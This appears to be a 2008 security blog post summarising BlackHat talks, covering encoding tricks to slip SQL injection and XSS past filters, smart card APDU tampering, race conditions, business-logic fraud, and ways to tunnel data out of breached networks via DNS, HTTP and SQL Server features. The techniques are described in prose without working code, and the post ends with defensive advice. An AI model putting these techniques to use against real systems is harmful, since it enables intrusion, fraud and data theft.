BlackHat 2008, Day 2

The second day of BlackHat 2008 began with a keynote speech by Rod Beckstrom, the director of NCSC (the National Cyber Security Center.) Most of this consisted of painfully strained Civil War analogies and the overuse of the word “Cyber” to describe absolutely everything. He made some good points — specifically, that in order to truly solve information (er, “Cyber”) security problems, we have to know the desired end state, which is more than just fixing the exploits or vulnerabilities of the week. We don’t even fully understand the physics and economics of networks, security, and risk management. The economics of security has to be based around risk management — if the marginal cost of a security measure exceeds the marginal loss it prevents, it’s counterproductive (something the government seems to often miss when it comes to “national security” anti-terrorism measures.) He seemed overly worried about the IP protocol stack as a single point of failure, and wants to keep it out of the systems it’s currently out of (say, SMS, which works even when most of the cell network is down.) I find this overly alarmist mainly because the IP protocol stack has been constantly attacked and exhaustively examined for nearly thirty years, and even the hackers have pretty much given up on this sort of attack. Yes, a successful exploit of the IP stack that let you, say, reroute, modify, or destroy traffic would be catastrophic on the same scale as Kaminsky’s DNS attacks of the last month, but so would an asteroid strike — the potential impact is huge, but the likelihood is very low.

All that said, I wouldn’t argue for IP-izing currently-working non-IP networks like SMS, either. There’s simply no reason to.

Next, Arian Evans of WhiteHat security spoke on web application canonicalization, encoding, and transcoding attacks. This was one of the more interesting (and personally useful) talks of the conference for me. Web application vulnerabilities fall into two categories — syntax vulnerabilities, which fork code-paths, like SQL injection, cross-site scripting, etc., and semantic issues, consisting of errors in business logic. Syntax issues are normally fought by signature-based methods like IDS/IPS, WAFs (Web Application Firewalls), and XML firewalls. However, encoding syntax attacks can cause them to bypass these defenses.

Internationalized websites often require encoding and code page transitions in order to work. In addition, developers use encodings for type safety. An attacker can take advantage of these to get a syntax attack to its target:

  1. Choose a vulnerability you want to exploit (e.g. XSS, SQL Injection)
  2. Identify the parser on the target (browser, database, application, etc.)
  3. Identify the supported encodings, codepages, and character sets on the target
  4. Identify intermediate interpreters between you and the target that canonicalize alternative encodings, such as web browsers, web application firewalls, proxies, or other applications
  5. Encode your attack such that it will be parsed in the desired way by the target after being canonicalized by all the intermediaaries

This results in complex nested encodings, such as encoding SQL with the CHAR/CHR functions, then decimal encoding that, then URI encoding that result. The resultant mess goes right past IDS/IPS, but each interpreter strips off a layer of encoding, and when the payload finally reaches the target, it is interpreted property and works. More sophisticated, internationalized apps are often easier to hit, because you have more options for submitting encoded (in another codepage) metacharacters that are later transcoded by the applications.

The solutions offered for this were the usual — strong data typing, strong output encoding (to prevent XSS), and enforcing the code/data boundary whenever possible (which isn’t often when it comes to web apps.) Still, this is very good stuff for demonstrating a SQL injection or XSS vulnerability to a business manager who insists that it’s not really exploitable.

Next, Ivan Buetler gave a presentation on smart cards, specifically the security of APDU, the Application Protocol Data Unit. Smart cards are mass-produced by a few companies, then sent out to companies or agencies that want to use them for security. The buyer initializes them with software and policy, then gives them to a user, who personalizes them with specific keys (often under the guidance of their employer.) Software from the manufacturer can be used to initialize or personalize cards. This demo used the Axalto Access Client, specifically the COVE and CMS administration tools.

The card itself enforces PIN policies and (sometimes) generates keys. During initialization, applets (written in Java and converted to a smart card bytecode) are uploaded to the card to add functionality. The upload, and all communication with the card, is done in APDU codes. These are laid out in the ISO 7816 specification, but there are many vendor extensions, which tend to be poorly documented — so many that the ISO spec is almost useless in reading APDU. However, it’s a simple command structure — a command consists of a class byte, an instruction byte, two 1-byte parameters, a data length, and a variable-length data field (and of course a checksum.) Ivan used an app called Smart Card Toolkit Pro 13.4.2 (I can find no reference to it on the Internet other than offers to pirate or crack it) to sniff the communication with the cards and read the APDUs. He also developed his own tools to hook winscard.dll so as to add himself to the stream as a man in the middle and be able to modify APDUs (and thus send arbitrary commands to the card.)

This revealed some significant vulnerabilities. For instance, during initialization, a card can be set to either generate its own keys, or to accept keys being uploaded as-is. However, this is “enforced” by the card later telling the personalization software that it would like to generate its own keys. It’s a classic trusted-client scenario; if you modify the APDUs, the application can be convinced to ignore the card’s settings, and the card takes whatever the app sends. Lacking any APDU documentation, Ivan was only able to find a few settings like this, but if the designers of the Axalto smart card system think that’s an acceptable practice, there are probably many more.

Scott Stender of iSec Partners spoke next, about concurrency attacks in web applications. This started out with an explanation of multiprocessing (in short, on any given core, two things that execute “simultaneously” don’t really — they alternate really fast, which means that they do execute in an order, and you can’t always predict what that order is.) This would have been a more interesting talk to me had I not spent years debugging crazy stress and performance issues in the past — I’m quite familiar with concurrency and race conditions.

With web applications, web app frameworks like .NET and Java Struts define an interface that contains request context (e.g. cookies, local variables, session variables.) Access to shared resources needs to be protected, but since web access is asynchronous, threads sometimes find themselves working with dirty or stale data. The classic example is a bank – imagine a money transfer process like this:

  1. Collect source account number, destination account number, source account balance, destination account balance, and amount to transfer.
  2. Verify that the source account balance exceeds the amount to transfer.
  3. Set the destination account balance to its former balance plus the amount transferred, and set the source account balance to its former balance minus the amount transferred.

Seems perfectly sane. Now imagine that I put in a request to transfer my entire balance, then while that request is between steps 2 and 3, I start another request to transfer my entire balance, and it completes steps 1 and 2 before the first request resumes at 3. With multiprocessing this is quite possible — and it would result in my transferring twice as much money as I have (and likely without even having a negative source account balance.)

Concurrency flaws allow manipulating stateful assets (like the above bank accounts) or changing security parameters (like auth credentials or single-use redemption tokens such as gift certificate codes.)

The solution is well-established in the database world — transactions. Transactions are atomic, concurrent, isolated, and durable (the so-called “ACID test”) — a transaction succeeds or fails as a single unit (no part of it happens unless all of it happens), and none of the resources in a transaction may be touched until the transaction is complete. Web apps can implement their own transactions, or use the transactional support of their underlying database architecture. The important part is that there is some kind of end-to-end scoped lock (and global locks — that is, eliminating multiprocessing altogether and just doing one thing at a time — are both impractical for performance and lead to deadlocks.)

Concurrency flaws can be found in testing pretty easily — run load/stress tests and check for discrepancies afterwards. Usually something will show up. You can also add test hooks that encourage context changes to increase the likelihood of finding something. Scott also promised to upload his own tool, SyncTest, here in the coming weeks.

Jeremiah Grossman and Arian Evans also presented “Making Money on the Web the Black Hat Way.” This was all about business logic flaws, and the way they’ve been exploited to help underhanded people make tons of money without exploiting traditional “bugs” at all. These included:

  1. Creating artificial scarcity in ticket sales for events via denial of service. When you consider purchasing tickets, the site “reserves” them for a short time until you choose to purchase or not. Since it costs nothing to reserve tickets for a few minutes… one person can reserve a lot of tickets.
  2. Breaking CAPTCHAs for spammers. Some have terribly flawed implementations (e.g. the correct answer in a hidden field, or the image name), while others can be recognized by OCR software. Keep in mind that if OCR can read the CAPTCHA even 10% of the time, it’s “broken” — and it’s hard to make something that a computer can’t read even one time in ten that a human can still read. Also, there’s the Mechanical Turk solution — disguise CAPTCHA-solving as a “game” (usually one with porn as a prize) or just pay people overseas to solve them at low rates.
  3. Various overseas companies offer “password recovery” services, that will tell you “your” password for a small fee, usually $30-$150. Basically, they just guess those horrible cognitive password questions (“What was your first car? Who was your favorite teacher?”)
  4. Coupon fraud. Electronic coupons sometimes have predictable numbers, and some offers allow many coupons per order. Some people have bought over $150,000 of stuff with these coupons.
  5. Gaming micro-deposits. When you set up an electronic transfer, the bank will sometimes send you a small deposit (less than $1), which you then tell them the amount of to verify account ownership. Michael Largent opened 58,000 brokerage accounts and collected these payments. It’s not illegal under any normal financial law — the bank is sending you a gift. However, he got charged under the USA PATRIOT Act for using fake names (58,000 of them.) This is a really dubious charge (who uses a fake name on the Internet? Oh, that’s right, everybody), but that’s par for the course in Federal law.
  6. Application service provider bank robbery. Small banks don’t really make and run their own web sites — they buy a standard “banking product” from an application service provider. Some of these are really, really bad — the example one Grossman showed had no authorization. Once you logged in as a user, you could transfer money to and from any user so long as you knew the right account numbers (which other bugs in the site were very helpful in providing to you.) Crack an ASP, and you don’t just get to rob a bank, you get to rob many banks.
  7. Slow order cancellation. QVC, the popular shopping channel, was apparently not very good at canceling orders. One woman started to order something, then canceled the order at the last step, and received the order anyway. Finding this interesting, she tried it again. And again, and again, until she’d received $412,000 in QVC merchandise and sold it on eBay. According to law, if you are sent merchandise you did not order you’re entitled to keep it as a free gift. She’d probably been able to keep doing it for years, too, if QVC hadn’t caught on because she sold the items on eBay still in their QVC packaging. Ah, criminals are always so entertaining.
  8. Affiliate scams. People take advantage of affiliate offers in a host of ways. The most common are cookie-stuffing methods — rather than getting people to click links to affiliate sites like they’re supposed to, sneaky affiliates will embed links to the affiliate sites (often dozens or hundreds of offers) in IMG or IFRAME tags. Now whenever someone buys anything online the affiliate gets a check. They avoid referrer fields with SSL pages (or META REFRESH, or several other techniques.) Some get much more devious, with DNS rebinding, GIFAR, Flash malware, or other techniques. However, the affiliate networks can catch all this, because people sent to affiliate sites by such scams convert at a much lower rate (nearly zero) than those who clicked through to the site on purpose. This said, while people are caught constantly, apparently there is no evidence that anyone has ever been sued or charged over this sort of activity — it’s in a legal grey area where it’s not clear what, if anything, to charge them with.
  9. Trading on semi-public information. BusinessWire (a popular place to post press releases for business) had a forceful browsing vulnerability — press releases that had been uploaded but not officially released were stored at publicly-accessible URLs and just not linked to the home page. When someone found out, they started reading tomorrow’s news today and making stock trades on it. They made $8 million. A federal judge declared that they did not violate SEC regulations, because they had no insider privilege or fiduciary duty to the company — they were trading on nonpublic information, but no one who was forbidden to give it to them gave it to them. They could still be prosecuted for hacking, maybe (is typing a URL directly to a page and not following a link trail “hacking”?). but that’s hard to prove if you’re remotely careful — usually we catch hackers by following the money to them, Al Capone style. If the money is legal, and you have to catch them for the technical exploit, that’s hard.

The moral of the story: business logic flaws are serious money, possibly much more than the syntax flaws we spend so much time worrying about. Test everywhere, profile users, detect leaks and aberrant behavior.

The final presentation of the day that I attended was one by Michael Slaviero and Haroon Meer of SensePost on getting data out of protected networks.

Long ago, once someone compromised a machine, they could simply enable a shell on some port, then telnet in. However, firewalls stopped that, so they began to do reverse tunneling with ssh and netcat (as well as more custom software like tcpr and fport.) Outbound filtering stopped that, too, and so we got web shells — pieces of ASP/ASP.NET/PHP/whatever-the-web-server-runs code that could be uploaded into a webroot and would provide remote control facilities and file transfers. However, there are now a host of mechanisms available for tunneling data out of a compromised machine.

For one, XP’s IPv6 support can be used as a port proxy. The netsh command can set up a proxy such that one port on one (internet-accessible) machine is redirected to a different port on another (internal, behind the firewall) machine. Thus, one compromised edge machine can provide direct network access to any machine it can reach on any port. The ssh -L and -R can be used to similar effect on UNIX hosts. This is a great reason for defense in depth — if an edge machine is owned, the firewall as a source of protection is largely eliminated.

There is also DNS2TCP. If an attacker can get this onto a compromised machine, it allows full 2-way tunneling of arbitrary TCP over DNS — the one protocol that is allowed everywhere. Once again, this bypasses the firewall. SensePost also demonstrated their own app (glenn.jsp) which encoded TCP over well-formed HTTP POST via base64 encoding. This is not just sending arbitrary traffic over port 80 (where an application-layer firewall will block it) — it’s true, valid HTTP requests against a real web page on the server, tunneling arbitrary TCP.

So with an edge web server under the attacker’s control, the firewall is bypassed in several ways, and your network is open to the attacker. But what if the attacker uses SQL Injection to get in? Then instead of a web server, they have a back-end SQL server with (hopefully) no access to the Internet, and thus no way to upload DNS2TCP or reach glenn.jsp. Well, it turns out that there are other ways that operate only on SQL.

Squeeza is an advanced SQL Injection tool. It separates content generation from return channel — you can have it return output via HTTP errors, via DNS tunneling (entirely in SQL!), or even via a blind timing channel (which is hideously slow — over a hundred milliseconds per bit — but works.) You can send all sorts of content through it — profile the version of the server, use existing OLE objects on the server in the server’s context (such as to write a working portscanner entirely in SQL), or (in many cases) take control of the machine.

SQL Server 2005 was the first SDL-developed version of SQL Server, and was intended to be far more secure by default than previous versions of SQL Server (which had over 1,000 stored procs enabled by default.) However, SQL Server is by its nature very hard to secure — it is very public, very capable, and highly targeted. What’s more, new features sell while better security doesn’t — so while most things are disabled by default, SQL 2005 has more “things” than ever before.

The downfall of a compromised SQL Server is in-band signaling. SQL Server’s configuration is controlled by stored procedures within SQL Server — so if you’ve gained sa access on a SQL Server, you can just turn all the disabled services back on. This includes the dreaded xp_cmdshell stored procedure (which runs shell commands as the server.) Using the new web service integration, you can write new SOAP endpoints entirely within SQL and place them on arbitrary ports — enable batch mode on those endpoints and they’ll allow running arbitrary SQL (thus getting you out of having to tunnel over DNS or use blind timing to get data out.) And if you enable the CLR, you can run arbitrary .NET code in the server (subject to CAS restrictions — unless you’re running as sa, in which case there are no restrictions at all.)

There are several interesting ways to get your arbitrary .NET apps onto the server. You can order the server to load them directly from a UNC path — if the server has outbound access to your server, which is unlikely. However, you can write SQL that creates the assembly in memory from raw hex and loads it. You leave no trace on the disk, and run arbitrary code.

All this talk really tells you from a defender’s perspective is the importance of defense in depth. A compromise of either the web server or the database server essentially takes down the firewall from the attacker’s perspective — they can reach anything the server can, and can run port sweeps to find out what’s within reach. Thus, it’s vital to do several things:

  1. Run the web server and database server with least privilege. The attacker can’t get more access than the servers themselves have — both services should be running with only the minimal privilege required to perform their function. Web servers should only have access to the web root — and most importantly, only read access. Databases should never be accessed as sa — only as an account with execute access to needed stored procs and select access to needed tables. Don’t let a database INSERT or UPDATE — use stored procs for that.
  2. Segment your network securely. The web server shouldn’t be able to hit any IPs or ports that it doesn’t actually need to hit to serve web pages. Likewise with the database server. Both inbound and outbound filtering is important.

Overall, it was a great conference, and there was a lot of good information handed out.  I’ll be posting a recap of DefCon 16 over the next few days as well (once I have a chance to boil a notebook full of notes down to an intelligible post.)

attacks, legal, mitigations, SOA/XML, trusted client

If you enjoyed this post, please consider to leave a comment or subscribe to the feed and get future articles delivered to your feed reader.